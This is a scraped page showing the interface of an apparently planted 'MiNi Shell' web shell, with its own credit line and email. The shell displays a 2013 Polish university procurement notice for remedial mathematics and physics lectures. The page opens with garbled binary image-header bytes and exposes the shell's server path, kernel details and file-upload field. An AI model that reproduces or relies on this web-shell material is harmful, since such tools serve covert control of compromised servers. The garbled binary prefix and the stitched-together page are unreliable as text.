JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130206/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130206/19307-N-2013.html

<p class="kh_header"><b>Gliwice: Przeprowadzenie zajęć wyrównawczych z matematyki, fizyki.Oznaczenie sprawy: OZ/U/12/NC/13</b><br>
<b>Numer ogłoszenia: 19307 - 2013; data zamieszczenia: 06.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Śląska , ul. Akademicka 2A, 44-100 Gliwice, woj. śląskie, tel. (032) 237 13 34, 2371335, faks 0322371334, 2372255, 2372660.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć wyrównawczych z matematyki, fizyki.Oznaczenie sprawy: OZ/U/12/NC/13.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia  jest przeprowadzenie zajęć wyrównawczych z fizyki i matematyki dla studentów I roku studiów stacjonarnych kierunku Inżynieria Materiałowa, realizowanych w ramach projektu: Inżynieria Materiałowa ciekawe studia, pewne studia. Przedmiot zamówienia został podzielony na 2 zadania. Zadanie 1 -  Przeprowadzenie zajęć  wyrównawczych z matematyki. Zadanie 2 -  Przeprowadzenie zajęć  wyrównawczych z fizyki.
2. CPV: 80.30.00.00-7 Usługi szkolnictwa wyższego
3. Termin realizacji: od dnia podpisania umowy  do 30.06.2013 r., zgodnie ze szczegółowym harmonogramem zajęć ustalonych przez Zamawiającego (Kierownika Projektu) i Wykonawcę 
w ciągu 5 dni od dnia podpisania umowy. Terminy podane w harmonogramie mogą ulec zmianie, za odpowiednim porozumieniem stron.
4. Przedmiot zamówienia jest finansowany na podstawie umowy: UDA-POKL 04.01.02-00-251/12-00 z dnia 12.11.2012 tytuł:. Inżynieria Materiałowa - Ciekawe  studia, pewna przyszłość. Projekt realizowany 
w ramach Europejskiego Funduszu Społecznego.  Priorytet  IV Szkolnictwo wyższe i nauka, Działania 4.1. Wzmocnienie i rozwój potencjału dydaktycznego uczelni oraz zwiększenie liczby absolwentów  kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy. Poddziałanie 4.1.2. Zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy. Płatne z projektu FSD-7/RM0/2012..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować minimum  1 osobą zdolną do wykonania zamówienia, która będzie odpowiedzialna m.in. za prawidłową realizację zamówienia i posiadającą:
- dla zadania 1:  tytuł co najmniej doktora  oraz doświadczenie
w prowadzeniu zajęć dydaktycznych  z przedmiotu matematyka
w szkole wyższej  przez  co najmniej 2 semestry. 
- dla zadania 2: tytuł co najmniej doktora  oraz doświadczenie
w prowadzeniu zajęć dydaktycznych  z przedmiotu fizyka
w szkole wyższej  przez  co najmniej 2 semestry.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">A) Wymagania dotyczące przedmiotu zamówienia jakie musi spełnić Wykonawca: 1. Zaoferowanie ceny, terminów, warunków realizacji zamówienia. B) Wymagane dokumenty i załączniki potwierdzające spełnianie wymagań  dotyczących przedmiotu zamówienia: 1.1. Oferta cenowa.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pisemne zobowiązanie innych podmiotów lub inne dokumenty potwierdzające oddanie Wykonawcy do dyspozycji niezbędnych zasobów, o których mowa w pkt. III.3.4 niniejszego ogłoszenia- jeżeli dotyczy. Wymaga się aby pisemne zobowiązania innych podmiotów lub inne dokumenty potwierdzające oddanie Wykonawcy do dyspozycji niezbędnych zasobów składane były w oryginale. 2) Jeżeli w miejscu zamieszkania osoby lub w kraju,w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o których mowa w pkt. III 4.3.1 niniejszego ogłoszenia, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 3) Dokumenty sporządzone w języku obcym powinny być złożone wraz z tłumaczeniem na język polski, za wyjątkiem dokumentów, których złożenie Zamawiający dopuścił w języku obcym. 4) Ww. dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (czytelny podpis lub podpis z imienną pieczątką) tj. przez osoby reprezentujące Wykonawcę lub przez pełnomocnika upoważnionego do złożenia oferty w jego imieniu. Sposób reprezentacji musi być zgodny z właściwym wypisem z rejestru. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia oraz w przypadku innych podmiotów (oddających Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przez Wykonawcę przy wykonywaniu zamówienia) kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów powinny być poświadczone za zgodność z oryginałem przez Wykonawcę lub te podmioty. 5) W przypadku składania oświadczeń lub podpisywania jakichkolwiek dokumentów przez PEŁNOMOCNIKA wymagane jest dołączenie oryginału pełnomocnictwa z podpisem mocodawcy lub kopii uwierzytelnionej notarialnie. 6) Wykonawcy mogą wspólnie ubiegać się o udzielenia zamówienia. W tym przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do tych Wykonawców. Należy dołączyć do oferty stosowne pełnomocnictwo do reprezentowania podmiotów występujących wspólnie w postępowaniu o udzielenie zamówienia; pełnomocnictwo to powinno być udzielone (podpisane) przez podmioty występujące wspólnie. Jeżeli oferta Wykonawców, występujących wspólnie zostanie wybrana, Zamawiający (przed zawarciem umowy) może żądać umowy regulującej ich współpracę. 7) Zamawiający nie wymaga, aby Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji zamówienia, przedkładał także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla Wykonawcy, określonym w pkt. III.4.2) niniejszego ogłoszenia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Nie będą możliwe istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem następujących przypadków: 
1. zmiany terminu realizacji zamówienia ze względu na:
-przyczyny leżące po stronie Zamawiającego
-inne niezawinione przyczyny spowodowane przez tzw. siłę wyższą np. pożar, zalanie itp. 
2. poprawy jakości lub innych parametrów charakterystycznych dla danej części usługi, 
3. zmiany w kolejności i terminach realizacji zamówienia, zmiany w kolejności i terminach płatności 
    (w tym płatności częściowe - jeżeli dotyczy) za realizację zamówienia w sytuacji, kiedy są one
    korzystne dla Zamawiającego,
4. zmiany zakresu zamówienia wykonywanego przy pomocy podwykonawców (w przypadku
    zadeklarowania przez Wykonawcę realizacji zamówienia przy pomocy podwykonawców),
5. obniżenie ilości/wielkości przedmiotu zamówienia i tym samym wynagrodzenia Wykonawcy, 
    wynikające z zaistnienia obiektywnych przesłanek konieczności takiej zmiany.
6. zmiany osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się 
    co najmniej równoważnymi kwalifikacjami zawodowymi, doświadczeniem, wykształceniem, o których mowa w SIWZ.
7. zmiany miejsca prowadzenia zajęć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.polsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Śląska, Dział Zamówień Publicznych i Zaopatrzenia, 44-100 Gliwice, ul. Konarskiego 18, pok. 511.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2013 godzina 08:30, miejsce: Politechnika Śląska, Dział Zamówień Publicznych i Zaopatrzenia, 44-100 Gliwice, ul. Konarskiego 18, pok. 511.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Przedmiot zamówienia jest finansowany na podstawie umowy: UDA-POKL 04.01.02-00-251/12-00 z dnia 12.11.2012 tytuł:. Inżynieria Materiałowa - Ciekawe  studia, pewna przyszłość. Projekt realizowany 
w ramach Europejskiego Funduszu Społecznego.  Priorytet  IV Szkolnictwo wyższe i nauka, Działania 4.1. Wzmocnienie i rozwój potencjału dydaktycznego uczelni oraz zwiększenie liczby absolwentów  kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy. Poddziałanie 4.1.2. Zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy. Płatne z projektu FSD-7/RM0/2012.
2. Rozliczenie nastąpi na podstawie faktury VAT/rachunku wystawionej na Politechnikę Śląską, 44 - 100 Gliwice,
ul. Akademicka 2A po zakończeniu kompleksowej realizacji. Zamawiający zapłaci za faktycznie przepracowane godziny na podstawie sporządzonych przez Wykonawcę i zaakceptowanych przez Zamawiającego list obecności oraz kart czasu pracy. 3. Zamawiający zobowiązuje się dokonać zapłaty należności na rachunek Wykonawcy podany na fakturze/rachunku 
 w terminie do 30 dni od daty złożenia faktury/rachunku i spełnienia warunków umowy. Zamawiający zobowiązuje się dokonać
 zapłaty należności na rachunek Wykonawcy podany na fakturze/rachunku w terminie do 30 dni od daty złożenia 
 faktury/rachunku i spełnienia warunków jw..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 -  Przeprowadzenie zajęć  wyrównawczych z matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje  przeprowadzenie zajęć wyrównawczych z przedmiotu matematyka dla studentów  I  roku studiów stacjonarnych   kierunku Inżynieria Materiałowa, realizowanych w ramach projektu: Inżynieria Materiałowa ciekawe studia, pewne studia.
A) Celem zajęć jest uzupełnienie wiedzy uczestników z przedmiotu  matematyki .  Zajęcia będą obejmować  następujące treści programowe:  
1.Rozwiązywanie równań i nierówności wymiernych, niewymiernych i prostych trygonometrycznych. 
2. Wyznaczanie dziedziny funkcji.
3. Wyznaczanie granic jednostronnych i obustronnych funkcji.
4.Obliczanie pochodnych rzędu pierwszego i wyższych, dla funkcji złożonych. 
5. Rozwiązywanie zagadnień wymagających zastosowania pochodnych funkcji i ich własności.
6. Obliczanie całek nieoznaczonych i oznaczonych. Zagadnienia prowadzące do całek oznaczonych.
7.Wybrane elementy geometrii analitycznej.

B) Szczegółowy opis przedmiotu zamówienia:
1. Zajęcia muszą mieć formę wykładu  w ilości 30h - (15 wykładów). Zajęcia prowadzone będą 
w j. polskim. (1 godzina lekcyjna = 45 minut).
2. Zajęcia dydaktyczne będą odbywać się zgodnie z harmonogramem zajęć, który zostanie ustalony
 w ciągu 5 dni od dnia podpisania umowy.
3. Zamawiający zapewni pomieszczenia wykładowe, w których będą  przeprowadzane zajęcia. Zajęcia będą odbywać się w budynku Wydziału Inżynierii Materiałowej i Metalurgii Politechniki Śląskiej 
w Katowicach. 
4. Zamawiający udostępni Wykonawcy własny sprzęt komputerowy. W/w sprzęt posiada zainstalowane odpowiednie licencjonowane programy komputerowe ( pakiet Office).
5. Grupa studencka będzie składała się maksymalnie z 45 osób dla zajęć wykładowych.
6. Wykonawca będzie zobowiązany do prowadzenia list obecności. Po zakończeniu zajęć dydaktycznych, w ciągu 4 dni roboczych Wykonawca musi przekazać Zamawiającemu w/w dokumenty.
7. Wszystkie dokumenty dotyczące przedmiotu zamówienia wiążące się z funkcjonowaniem Uczelni lub Wydziału, Wykonawca będzie odbierał (np. nr sali dydaktycznej, hasła do komputerów itp.) od Zamawiającego i dostarczał (np. listy obecności, itp.) Zamawiającemu  na adres: Politechnika Śląska, Katedra Nauki o Materiałach, 40-019 Katowice ul. Krasińskiego 8b, p. 5. 
8. Zamawiający zapłaci za faktycznie przeprowadzone godziny na podstawie sporządzonych przez Wykonawcę i zaakceptowanych przez Zamawiającego list obecności  i kart czasu pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 -  Przeprowadzenie zajęć wyrównawczych z fizyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia- obejmuje  przeprowadzenie zajęć wyrównawczych z przedmiotu fizyka dla studentów  I  roku studiów stacjonarnych  kierunku Inżynieria Materiałowa, realizowanych w ramach projektu: Inżynieria Materiałowa ciekawe studia, pewne studia.
A) Celem zajęć jest uzupełnienie wiedzy uczestników z przedmiotu  fizyki. Zajęcia będą obejmować  następujące treści programowe:  
1. Wielkości fizyczne i ich jednostki, układ jednostek SI. Wielkości skalarne i wektorowe, działania na wektorach. Praktyczne uwagi dotyczące rozwiązywania zadań z fizyki. Opis ruchu punktu materialnego; położenie, droga, przemieszczenie, tor ruchu, prędkość chwilowa i średnia, przyspieszenie, równania ruchu. Ruch jednostajny i zmienny, rzut pionowy i swobodny spadek. Ruch krzywoliniowy, rzut poziomy i ukośny, ruch po okręgu.
2. Zasady dynamiki Newtona. Pęd. Praca i energia. Zasady zachowania w fizyce. Zasady dynamiki ruchu obrotowego. Moment pędu. Energia kinetyczna w ruchu obrotowym. 
3. Oscylator harmoniczny. Ruch drgający. Przykłady - Wahadło matematyczne i fizyczne.
4. Pole elektryczne - prawo Coulomba, natężenie i potencjał pola, praca w polu elektrostatycznym. Ruch cząstek w polu elektrycznym. Pojemność elektryczna. Przepływ prądu elektrycznego, prawo Ohma
i prawa Kirchhoffa. 
5. Pole magnetyczne; ruch cząstek w polu magnetycznym. Zjawisko indukcji elektromagnetycznej, oddziaływania elektrodynamiczne.
6. Fale elektromagnetyczne; odbicie, załamanie, dyfrakcja, interferencja i polaryzacja światła; zjawisko fotoelektryczne. Przyrządy optyczne - zwierciadło, soczewki - powstawanie obrazów
7. Przemiany gazu doskonałego. Zasady termodynamiki. Ciepło, bilans ciepła. Podstawy fizyki atomowej - zjawisko fotoelektryczne, teoria Bohra, prawo rozpadu promieniotwórczego.

B) Szczegółowy opis przedmiotu zamówienia:
1. Zajęcia muszą mieć formę wykładu  w ilości 30h - (15 wykładów). Zajęcia prowadzone będą
     w j. polskim. (1 godzina lekcyjna = 45 minut).
2. Zajęcia dydaktyczne będą odbywać się zgodnie z harmonogramem zajęć, który zostanie ustalony
 w ciągu 5 dni od dnia podpisania umowy.
3. Zamawiający zapewni pomieszczenia wykładowe, w których  będą  przeprowadzane zajęcia. Zajęcia będą odbywać się w budynku Wydziału Inżynierii Materiałowej i Metalurgii Politechniki Śląskiej
w Katowicach. 
4. Zamawiający udostępni Wykonawcy własny sprzęt komputerowy. W/w sprzęt posiada zainstalowane odpowiednie licencjonowane programy komputerowe ( pakiet Office).
5. Grupa studencka będzie składała się maksymalnie z 45 osób dla zajęć wykładowych.
6. Wykonawca będzie zobowiązany do prowadzenia list obecności. Po zakończeniu zajęć dydaktycznych, w ciągu 4 dni roboczych  Wykonawca musi przekazać Zamawiającemu w/w dokumenty.
7. Wszystkie dokumenty dotyczące przedmiotu zamówienia wiążące się z funkcjonowaniem Uczelni lub Wydziału, Wykonawca będzie odbierał (np. nr sali dydaktycznej, hasła do komputerów itp.) od Zamawiającego i dostarczał (np. listy obecności, itp.) Zamawiającemu  na adres: Politechnika Śląska, Katedra Nauki o Materiałach, 40-019 Katowice ul. Krasińskiego 8b, p. 5. 
8. Zamawiający zapłaci za faktycznie przeprowadzone godziny na podstawie sporządzonych przez Wykonawcę i zaakceptowanych przez Zamawiającego list obecności oraz kart czasu pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com